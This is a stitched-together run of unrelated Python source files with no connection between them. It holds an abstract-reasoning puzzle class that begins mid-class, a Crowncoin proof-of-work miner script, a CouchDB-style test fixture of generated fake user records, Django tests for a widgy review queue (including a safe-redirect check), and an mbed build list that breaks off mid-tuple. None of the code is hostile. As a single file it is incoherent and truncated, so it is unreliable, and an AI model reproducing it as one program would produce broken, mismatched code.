"""Class that holds instance of an image PGM."""
def __init__(self,
solution,
alternatives,
position,
solution_factors=None,
alternatives_factors=None,
num_factor_values=None):
"""Constructs a PGMInstance.
Args:
solution: Numpy array of shape (num_rows, num_cols, width, height,
channels) with the images of the PGM solution.
alternatives: Numpy array of shape (num_alternatives, width, height,
channels) with the images of the alternatives.
position: Integer with position where solution should be inserted.
solution_factors: Numpy array of shape (num_rows, num_cols, num_factors)
with the factors of the PGM solution.
alternatives_factors: Numpy array of shape (num_alternatives, num_factors)
with the factors of the alternatives.
num_factor_values: List with the number of values for each factor.
"""
self.solution = solution
self.alternatives = alternatives
self.position = position
self.solution_factors = solution_factors
self.alternatives_factors = alternatives_factors
self.num_factor_values = num_factor_values
def get_context(self):
"""Returns the context.
Returns:
Numpy array of shape (num_rows*num_cols - 1, width, height, channels).
"""
context = []
for row in self.solution:
context += list(row)
return np.array(context[:-1], dtype=np.float32)
def get_answers(self):
"""Returns the answers.
Returns:
Numpy array of shape (num_alternatives + 1, width, height, channels).
"""
result = list(self.alternatives)
result.insert(self.position, self.solution[-1, -1])
return np.array(result, dtype=np.float32)
def get_context_factor_values(self):
"""Returns the context ground truth factos as integer values.
Returns:
Numpy array of shape (num_rows*num_cols - 1, len(num_factor_values).
"""
context = []
for row in self.solution_factors:
context += list(row)
return np.array(context[:-1])
def get_answers_factor_values(self):
"""Returns the answers ground truth factos as integer values.
Returns:
Numpy array of shape (num_alternatives + 1, len(num_factor_values).
"""
result = list(self.alternatives_factors)
result.insert(self.position, self.solution_factors[-1, -1])
return np.array(result)
def range_embed_factors(self, factors):
"""Embeds the factors linearly in [-0.5, 0.5] based on integer values.
Args:
factors: Numpy array of shape (:, len(num_factor_values)) with factors.
Returns:
Numpy array of shape (:, len(num_factor_values)) with floats.
"""
result = np.array(factors, dtype=np.float32)
max_vals = np.array(self.num_factor_values, dtype=np.float32) - 1.
result /= np.expand_dims(max_vals, 0)
return result - .5
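# Worked example (hypothetical values): with num_factor_values=[3], the integer
# factor values 0, 1, 2 map to -0.5, 0.0 and 0.5 respectively.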
def onehot_embed_factors(self, factors):
"""Embeds the factors as one-hot vectors.
Args:
factors: Numpy array of shape (:, len(num_factor_values)) with factors.
Returns:
Numpy array of shape (:, sum(num_factor_values)) with floats.
"""
result = []
for i, num in enumerate(self.num_factor_values):
result.append(onehot(factors[:, i], num))
return np.array(np.concatenate(result, axis=-1), dtype=np.float32)
def training_sample(self):
"""Returns a single training example."""
sample = {}
sample["context"] = self.get_context()
sample["answers"] = self.get_answers()
if self.solution_factors is not None:
context_factors = self.get_context_factor_values()
answers_factors = self.get_answers_factor_values()
sample["context_factor_values"] = self.range_embed_factors(
context_factors)
sample["answers_factor_values"] = self.range_embed_factors(
answers_factors)
sample["context_factors_onehot"] = self.onehot_embed_factors(
context_factors)
sample["answers_factors_onehot"] = self.onehot_embed_factors(
answers_factors)
return sample, self.position
def make_image(self, answer=False, padding_px=8, border_px=4):
"""Creates an image of the PGMInstance."""
# Create the question side that contains the progression matrix.
question = np.copy(self.solution)
if question.shape[-1] == 1:
question = np.repeat(question, 3, -1)
if not answer:
question[-1, -1] = question_mark()
# Build up the image on the context side.
rows = []
for i in range(question.shape[0]):
row = []
for j in range(question.shape[1]):
# Do the border around the image.
color = np.array([1., 1., 1.])
if answer and i == (question.shape[0] - 1) and j == (question.shape[1] -
1):
color = COLORS["green"]
row.append(
visualize_util.pad_around(question[i, j], border_px, value=color))
rows.append(visualize_util.padded_stack(row, padding_px, axis=1))
question_image = visualize_util.padded_stack(rows, padding_px)
separator = np.zeros((question_image.shape[0], 2, question_image.shape[2]))
# Create the answer side.
answers = self.get_answers()
if answers.shape[-1] == 1:
answers = np.repeat(answers, 3, -1)
answers_with_border = []
for i, image in enumerate(answers):
color = np.array([1., 1., 1.])
if answer:
color = COLORS["green"] if i == self.position else COLORS["red"]
answers_with_border.append(
visualize_util.pad_around(image, border_px, value=color))
answer_image = visualize_util.padded_grid(answers_with_border,
question.shape[0], padding_px)
center_crop = visualize_util.padded_stack(
[question_image, separator, answer_image], padding_px, axis=1)
return visualize_util.pad_around(
visualize_util.add_below(center_crop, padding_px), padding_px)
class Quantizer(gtd.GroundTruthData):
"""Quantizes a GroundTruthData to have a maximal number of factors."""
def __init__(self, wrapped_ground_truth_data, max_factors):
"""Constructs a Quantizer.
Args:
wrapped_ground_truth_data: GroundTruthData that should be quantized.
max_factors: integer with the maximal number of factors.
"""
self.wrapped_ground_truth_data = wrapped_ground_truth_data
self.true_num_factors = wrapped_ground_truth_data.factors_num_values
self.fake_num_factors = list(np.minimum(self.true_num_factors, max_factors))
@property
def num_factors(self):
return self.wrapped_ground_truth_data.num_factors
@property
def factors_num_values(self):
return self.fake_num_factors
@property
def observation_shape(self):
return self.wrapped_ground_truth_data.observation_shape
def sample_factors(self, num, random_state):
"""Sample a batch of factors Y."""
factors = np.zeros(shape=(num, self.num_factors), dtype=np.int64)
for i in range(self.num_factors):
factors[:, i] = self._sample_factor(i, num, random_state)
return factors
def _sample_factor(self, i, num, random_state):
return random_state.randint(self.factors_num_values[i], size=num)
def sample_observations_from_factors(self, factors, random_state):
"""Sample a batch of observations X given a batch of factors Y."""
translated_factors = np.copy(factors)
for i in range(self.num_factors):
if self.true_num_factors[i] != self.fake_num_factors[i]:
ratio = float(self.true_num_factors[i]) / float(
self.fake_num_factors[i])
translated_factors[:, i] = np.floor(factors[:, i] * ratio)
return self.wrapped_ground_truth_data.sample_observations_from_factors(
translated_factors, random_state)
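# Worked example (hypothetical sizes): a true factor with 10 values quantized to
# 4 gives ratio 2.5, so fake values 0..3 translate to true values 0, 2, 5 and 7.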
COLORS = {
"blue": np.array([66., 103., 210.]) / 255.,
"red": np.array([234., 67., 53.]) / 255.,
"yellow": np.array([251., 188., 4.]) / 255.,
"green": np.array([52., 168., 83.]) / 255.,
"grey": np.array([154., 160., 166.]) / 255.,
}
QUESTION_MARK = [None]
def question_mark():
"""Returns an image of the question mark."""
# Cache the image so it is not always reloaded.
if QUESTION_MARK[0] is None:
with tf.gfile.Open(
resources.get_file("google/abstract_reasoning/data/question_mark.png"),
"rb") as f:
QUESTION_MARK[0] = np.array(Image.open(f).convert("RGB")) * 1.0 / 255.
return QUESTION_MARK[0]
def onehot(indices, num_atoms):
"""Embeds the indices as one hot vectors."""
return np.eye(num_atoms)[indices]
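# Usage sketch: onehot(np.array([0, 2]), 3) returns [[1., 0., 0.], [0., 0., 1.]].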
|
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Crowncoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class CrowncoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
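# Illustrative check (hypothetical value): bytereverse(0x12345678) == 0x78563412;
# bufreverse() applies that flip word-by-word and wordreverse() reverses the word
# order, together converting getwork's hex-encoded layout into hashable byte order.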
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
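# midstate optimization: the SHA-256 state of the constant 76 bytes is computed
# once here; each nonce attempt below only hashes the remaining 4 bytes.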
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = CrowncoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9341
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""
Generated with http://www.json-generator.com/
With this pattern:
[
'{{repeat(20)}}',
{
_id: '{{guid()}}',
user_id: "{{index()}}",
name: {
first: "{{firstName()}}",
last: "{{surname()}}"
},
age: "{{integer(18,90)}}",
location: {
state: "{{state()}}",
city: "{{city()}}",
address: {
street: "{{street()}}",
number: "{{integer(10, 10000)}}"
}
},
company: "{{company()}}",
email: "{{email()}}",
manager: "{{bool()}}",
twitter: function(tags) {
if(this.manager)
return;
return "@" + this.email.split("@")[0];
},
favorites: [
"{{repeat(2,5)}}",
"{{random('C', 'C++', 'Python', 'Ruby', 'Erlang', 'Lisp')}}"
]
}
]
"""
import copy
def setup(db, index_type="view", **kwargs):
db.recreate()
db.save_docs(copy.deepcopy(DOCS))
if index_type == "view":
add_view_indexes(db, kwargs)
elif index_type == "text":
add_text_indexes(db, kwargs)
def add_view_indexes(db, kwargs):
indexes = [
["user_id"],
["name.last", "name.first"],
["age"],
[
"location.state",
"location.city",
"location.address.street",
"location.address.number"
],
["company", "manager"],
["manager"],
["favorites"],
["favorites.3"],
["twitter"]
]
for idx in indexes:
assert db.create_index(idx) is True
def add_text_indexes(db, kwargs):
db.create_text_index(**kwargs)
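# Usage sketch (hypothetical db handle): setup(db, index_type="view") recreates
# the database, loads DOCS, and builds the view indexes listed above;
# index_type="text" builds a text index from the keyword arguments instead.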
DOCS = [
{
"_id": "71562648-6acb-42bc-a182-df6b1f005b09",
"user_id": 0,
"name": {
"first": "Stephanie",
"last": "Kirkland"
},
"age": 48,
"location": {
"state": "Nevada",
"city": "Ronco",
"address": {
"street": "Evergreen Avenue",
"number": 347
}
},
"company": "Dreamia",
"email": "stephaniekirkland@dreamia.com",
"manager": False,
"twitter": "@stephaniekirkland",
"favorites": [
"Ruby",
"C",
"Python"
],
"test" : [{"a":1}, {"b":2}]
},
{
"_id": "12a2800c-4fe2-45a8-8d78-c084f4e242a9",
"user_id": 1,
"name": {
"first": "Abbott",
"last": "Watson"
},
"age": 31,
"location": {
"state": "Connecticut",
"city": "Gerber",
"address": {
"street": "Huntington Street",
"number": 8987
}
},
"company": "Talkola",
"email": "abbottwatson@talkola.com",
"manager": False,
"twitter": "@abbottwatson",
"favorites": [
"Ruby",
"Python",
"C",
{"Versions": {"Alpha": "Beta"}}
],
"test" : [{"a":1, "b":2}]
},
{
"_id": "48ca0455-8bd0-473f-9ae2-459e42e3edd1",
"user_id": 2,
"name": {
"first": "Shelly",
"last": "Ewing"
},
"age": 42,
"location": {
"state": "New Mexico",
"city": "Thornport",
"address": {
"street": "Miller Avenue",
"number": 7100
}
},
"company": "Zialactic",
"email": "shellyewing@zialactic.com",
"manager": True,
"favorites": [
"Lisp",
"Python",
"Erlang"
],
"test_in": {"val1" : 1, "val2": "val2"}
},
{
"_id": "0461444c-e60a-457d-a4bb-b8d811853f21",
"user_id": 3,
"name": {
"first": "Madelyn",
"last": "Soto"
},
"age": 79,
"location": {
"state": "Utah",
"city": "Albany",
"address": {
"street": "Stockholm Street",
"number": 710
}
},
"company": "Tasmania",
"email": "madelynsoto@tasmania.com",
"manager": True,
"favorites": [[
"Lisp",
"Erlang",
"Python"
],
"Erlang",
"C",
"Erlang"
],
"11111": "number_field",
"22222": {"33333" : "nested_number_field"}
},
{
"_id": "8e1c90c0-ac18-4832-8081-40d14325bde0",
"user_id": 4,
"name": {
"first": "Nona",
"last": "Horton"
},
"age": 61,
"location": {
"state": "Georgia",
"city": "Corinne",
"address": {
"street": "Woodhull Street",
"number": 6845
}
},
"company": "Signidyne",
"email": "nonahorton@signidyne.com",
"manager": False,
"twitter": "@nonahorton",
"favorites": [
"Lisp",
"C",
"Ruby",
"Ruby"
],
"name.first" : "name dot first"
},
{
"_id": "a33d5457-741a-4dce-a217-3eab28b24e3e",
"user_id": 5,
"name": {
"first": "Sheri",
"last": "Perkins"
},
"age": 73,
"location": {
"state": "Michigan",
"city": "Nutrioso",
"address": {
"street": "Bassett Avenue",
"number": 5648
}
},
"company": "Myopium",
"email": "sheriperkins@myopium.com",
"manager": True,
"favorites": [
"Lisp",
"Lisp"
]
},
{
"_id": "b31dad3f-ae8b-4f86-8327-dfe8770beb27",
"user_id": 6,
"name": {
"first": "Tate",
"last": "Guy"
},
"age": 47,
"location": {
"state": "Illinois",
"city": "Helen",
"address": {
"street": "Schenck Court",
"number": 7392
}
},
"company": "Prosely",
"email": "tateguy@prosely.com",
"manager": True,
"favorites": [
"C",
"Lisp",
"Ruby",
"C"
]
},
{
"_id": "659d0430-b1f4-413a-a6b7-9ea1ef071325",
"user_id": 7,
"name": {
"first": "Jewell",
"last": "Stafford"
},
"age": 33,
"location": {
"state": "Iowa",
"city": "Longbranch",
"address": {
"street": "Dodworth Street",
"number": 3949
}
},
"company": "Niquent",
"email": "jewellstafford@niquent.com",
"manager": True,
"favorites": [
"C",
"C",
"Ruby",
"Ruby",
"Erlang"
],
"exists_field" : "should_exist1"
},
{
"_id": "6c0afcf1-e57e-421d-a03d-0c0717ebf843",
"user_id": 8,
"name": {
"first": "James",
"last": "Mcdaniel"
},
"age": 68,
"location": {
"state": "Maine",
"city": "Craig",
"address": {
"street": "Greene Avenue",
"number": 8776
}
},
"company": "Globoil",
"email": "jamesmcdaniel@globoil.com",
"manager": True,
"favorites": None,
"exists_field" : "should_exist2"
},
{
"_id": "954272af-d5ed-4039-a5eb-8ed57e9def01",
"user_id": 9,
"name": {
"first": "Ramona",
"last": "Floyd"
},
"age": 22,
"location": {
"state": "Missouri",
"city": "Foxworth",
"address": {
"street": "Lott Place",
"number": 1697
}
},
"company": "Manglo",
"email": "ramonafloyd@manglo.com",
"manager": True,
"favorites": [
"Lisp",
"Erlang",
"Python"
],
"exists_array" : ["should", "exist", "array1"],
"complex_field_value" : "+-(){}[]^~&&*||\"\\/?:!"
},
{
"_id": "e900001d-bc48-48a6-9b1a-ac9a1f5d1a03",
"user_id": 10,
"name": {
"first": "Charmaine",
"last": "Mills"
},
"age": 43,
"location": {
"state": "New Hampshire",
"city": "Kiskimere",
"address": {
"street": "Nostrand Avenue",
"number": 4503
}
},
"company": "Lyria",
"email": "charmainemills@lyria.com",
"manager": True,
"favorites": [
"Erlang",
"Erlang"
],
"exists_array" : ["should", "exist", "array2"]
},
{
"_id": "b06aadcf-cd0f-4ca6-9f7e-2c993e48d4c4",
"user_id": 11,
"name": {
"first": "Mathis",
"last": "Hernandez"
},
"age": 75,
"location": {
"state": "Hawaii",
"city": "Dupuyer",
"address": {
"street": "Bancroft Place",
"number": 2741
}
},
"company": "Affluex",
"email": "mathishernandez@affluex.com",
"manager": True,
"favorites": [
"Ruby",
"Lisp",
"C",
"C++",
"C++"
],
"exists_object" : {"should": "object"}
},
{
"_id": "5b61abc1-a3d3-4092-b9d7-ced90e675536",
"user_id": 12,
"name": {
"first": "Patti",
"last": "Rosales"
},
"age": 71,
"location": {
"state": "Pennsylvania",
"city": "Juntura",
"address": {
"street": "Hunterfly Place",
"number": 7683
}
},
"company": "Oulu",
"email": "pattirosales@oulu.com",
"manager": True,
"favorites": [
"C",
"Python",
"Lisp"
],
"exists_object" : {"another": "object"}
},
{
"_id": "b1e70402-8add-4068-af8f-b4f3d0feb049",
"user_id": 13,
"name": {
"first": "Whitley",
"last": "Harvey"
},
"age": 78,
"location": {
"state": "Minnesota",
"city": "Trail",
"address": {
"street": "Pleasant Place",
"number": 8766
}
},
"company": None,
"email": "whitleyharvey@fangold.com",
"manager": False,
"twitter": "@whitleyharvey",
"favorites": [
"C",
"Ruby",
"Ruby"
]
},
{
"_id": "c78c529f-0b07-4947-90a6-d6b7ca81da62",
"user_id": 14,
"name": {
"first": "Faith",
"last": "Hess"
},
"age": 51,
"location": {
"state": "North Dakota",
"city": "Axis",
"address": {
"street": "Brightwater Avenue",
"number": 1106
}
},
"company": "Pharmex",
"email": "faithhess@pharmex.com",
"manager": True,
"favorites": [
"Erlang",
"Python",
"Lisp"
]
}
]
|
|
from __future__ import absolute_import
import datetime
import imp
import json
from django.utils import timezone
from django.utils.functional import cached_property
from django.contrib.auth.models import Permission, User
from django.test.client import RequestFactory
from widgy.contrib.review_queue.site import ReviewedWidgySite
from widgy.contrib.review_queue.models import (
ReviewedVersionTracker, ReviewedVersionCommit,
)
from .base import (
RootNodeTestCase, refetch, SwitchUserTestCase,
)
from .test_api import TestApi
from ..models import ReviewedVersionedPage, RawTextWidget
from ..widgy_config import widgy_site
def make_tracker(site, vt_class=ReviewedVersionTracker):
root_node = RawTextWidget.add_root(site, text='first').node
tracker = vt_class.objects.create(working_copy=root_node)
return tracker
def make_commit(site, delta=datetime.timedelta(0), vt_class=ReviewedVersionTracker):
tracker = make_tracker(site, vt_class)
commit = tracker.commit(publish_at=timezone.now() + delta)
return (tracker, commit)
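# Usage sketch: make_commit(widgy_site, delta=datetime.timedelta(days=1)) yields
# a (tracker, commit) pair whose commit is scheduled to publish one day from now.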
class TestApiReviewed(TestApi):
widgy_site = ReviewedWidgySite()
class ReviewQueueTest(RootNodeTestCase):
widgy_site = widgy_site
def test_review_queue(self):
tracker, commit1 = make_commit(self.widgy_site, vt_class=ReviewedVersionTracker)
p = Permission.objects.get(codename='change_versioncommit')
user = User.objects.create()
user.user_permissions.add(p)
user.save()
request_factory = RequestFactory()
tracker = refetch(tracker)
self.assertFalse(tracker.get_published_node(request_factory.get('/')))
commit1.approve(user)
tracker = refetch(tracker)
self.assertEqual(tracker.get_published_node(request_factory.get('/')),
commit1.root_node)
commit2 = tracker.commit(publish_at=timezone.now())
tracker = refetch(tracker)
self.assertEqual(tracker.get_published_node(request_factory.get('/')),
commit1.root_node)
commit2.approve(user)
tracker = refetch(tracker)
self.assertEqual(tracker.get_published_node(request_factory.get('/')),
commit2.root_node)
def test_foreign_key_to_proxy_works(self):
"""
If ReviewedVersionTracker is implemented as a proxy, ensure a
foreign key returns a ReviewedVersionTracker instance (instead
of the base model).
"""
tracker, commit1 = make_commit(self.widgy_site, vt_class=ReviewedVersionTracker)
page = ReviewedVersionedPage.objects.create(
version_tracker=tracker,
)
page = ReviewedVersionedPage.objects.get(pk=page.pk)
self.assertIsInstance(page.version_tracker, ReviewedVersionTracker)
self.assertEqual(page.version_tracker, tracker)
def test_clone_tracker(self):
tracker, _ = make_commit(self.widgy_site, vt_class=ReviewedVersionTracker)
new_tracker = tracker.clone()
self.assertNotEqual(new_tracker.head.reviewedversioncommit.pk,
tracker.head.reviewedversioncommit.pk)
class ReviewQueueViewsTest(SwitchUserTestCase, RootNodeTestCase):
widgy_site = ReviewedWidgySite()
@cached_property
def urls(self):
urls = imp.new_module('urls')
urls.urlpatterns = self.widgy_site.get_urls()
return urls
def test_commit_view(self):
tracker, first_commit = make_commit(self.widgy_site)
url = self.widgy_site.reverse(self.widgy_site.commit_view, kwargs={
'pk': tracker.pk,
})
with self.as_staffuser() as user:
with self.with_permission(user, 'add', ReviewedVersionCommit):
self.client.post(url, {'approve_it': 1, 'publish_radio': 'now'})
self.assertNotEqual(refetch(tracker).head.reviewedversioncommit, first_commit)
self.assertFalse(refetch(tracker).head.reviewedversioncommit.is_approved)
with self.as_staffuser() as user:
with self.with_permission(user, 'change', ReviewedVersionCommit):
with self.with_permission(user, 'add', ReviewedVersionCommit):
self.client.post(url, {'approve_it': 1, 'publish_radio': 'now'})
self.assertTrue(refetch(tracker).head.reviewedversioncommit.is_approved)
def test_approve_view(self):
tracker, commit = make_commit(self.widgy_site)
url = self.widgy_site.reverse(self.widgy_site.approve_view, kwargs={
'pk': tracker.pk,
'commit_pk': commit.pk,
})
commit.message = u'\N{SNOWMAN}'
commit.save()
with self.as_staffuser() as user:
resp = self.client.post(url)
self.assertEqual(resp.status_code, 403)
self.assertFalse(refetch(commit).is_approved)
with self.as_staffuser() as user:
with self.with_permission(user, 'change', ReviewedVersionCommit):
resp = self.client.post(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(refetch(commit).is_approved)
def test_unapprove_view(self):
tracker, commit = make_commit(self.widgy_site)
url = self.widgy_site.reverse(self.widgy_site.unapprove_view, kwargs={
'pk': tracker.pk,
'commit_pk': commit.pk,
})
commit.approve(self.user)
with self.as_staffuser() as user:
resp = self.client.post(url)
self.assertEqual(resp.status_code, 403)
self.assertTrue(refetch(commit).is_approved)
with self.as_staffuser() as user:
with self.with_permission(user, 'change', ReviewedVersionCommit):
resp = self.client.post(url)
self.assertEqual(resp.status_code, 302)
self.assertFalse(refetch(commit).is_approved)
def test_undo_approvals_view(self):
tracker, commit = make_commit(self.widgy_site)
tracker2, commit2 = make_commit(self.widgy_site)
url = self.widgy_site.reverse(self.widgy_site.undo_approvals_view)
commit.approve(self.user)
commit2.approve(self.user)
def doit():
return self.client.post(url, {
'actions': json.dumps([commit.pk]),
'referer': '/referer/',
})
with self.as_staffuser() as user:
resp = doit()
self.assertEqual(resp.status_code, 403)
self.assertTrue(refetch(commit).is_approved)
self.assertTrue(refetch(commit2).is_approved)
with self.as_staffuser() as user:
with self.with_permission(user, 'change', ReviewedVersionCommit):
resp = doit()
self.assertEqual(resp.status_code, 302)
self.assertEqual(resp['Location'], 'http://testserver/referer/')
self.assertFalse(refetch(commit).is_approved)
self.assertTrue(refetch(commit2).is_approved)
def test_undo_approvals_view_safe_redirect(self):
tracker, commit = make_commit(self.widgy_site)
url = self.widgy_site.reverse(self.widgy_site.undo_approvals_view)
with self.as_staffuser() as user:
with self.with_permission(user, 'change', ReviewedVersionCommit):
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'):
response = self.client.post(url, {
'actions': json.dumps([commit.pk]),
'referer': bad_url,
})
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response['Location'],
"%s should be blocked" % bad_url)
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'//testserver/',
'/url%20with%20spaces/'):
response = self.client.post(url, {
'actions': json.dumps([commit.pk]),
'referer': good_url,
})
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response['Location'],
"%s should be allowed" % good_url)
def test_published_versiontrackers(self):
vt_class = self.widgy_site.get_version_tracker_model()
tracker = make_tracker(self.widgy_site, vt_class)
self.assertNotIn(tracker, vt_class.objects.published())
commit = tracker.commit(publish_at=timezone.now())
self.assertNotIn(tracker, vt_class.objects.published())
commit.approve(self.user)
self.assertIn(tracker, vt_class.objects.published())
tracker2 = make_tracker(self.widgy_site, vt_class)
self.assertIn(tracker, vt_class.objects.published())
self.assertNotIn(tracker2, vt_class.objects.published())
commit2 = tracker2.commit(publish_at=timezone.now())
self.assertIn(tracker, vt_class.objects.published())
self.assertNotIn(tracker2, vt_class.objects.published())
other_commit = tracker.commit(publish_at=timezone.now())
other_commit.approve(self.user)
self.assertIn(tracker, vt_class.objects.published())
self.assertNotIn(tracker2, vt_class.objects.published())
commit2.approve(self.user)
self.assertIn(tracker, vt_class.objects.published())
self.assertIn(tracker2, vt_class.objects.published())
def test_published_stickiness(self):
vt_class = self.widgy_site.get_version_tracker_model()
tracker = make_tracker(self.widgy_site, vt_class)
# One commit is published, the other is approved. Since the same commit
# is not both published and approved, the tracker is not published.
c1 = tracker.commit(publish_at=timezone.now() + datetime.timedelta(days=1))
c1.approve(self.user)
tracker.commit(publish_at=timezone.now())
self.assertNotIn(tracker, vt_class.objects.published())
|
|
#!/usr/bin/env python2
"""
Travis-CI build script
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
################################################################################
# Configure builds here
# "libs" can contain "dsp", "rtos", "eth", "usb_host", "usb", "ublox", "fat"
build_list = (
{ "target": "LPC1768", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "eth", "usb_host", "usb", "ublox", "fat"] },
{ "target": "LPC2368", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "LPC2460", "toolchains": "GCC_ARM", "libs": ["rtos", "usb_host", "usb", "fat"] },
{ "target": "LPC11U24", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "OC_MBUINO", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "LPC11U24_301", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "B96B_F446VE", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_L053R8", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_L152RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F030R8", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
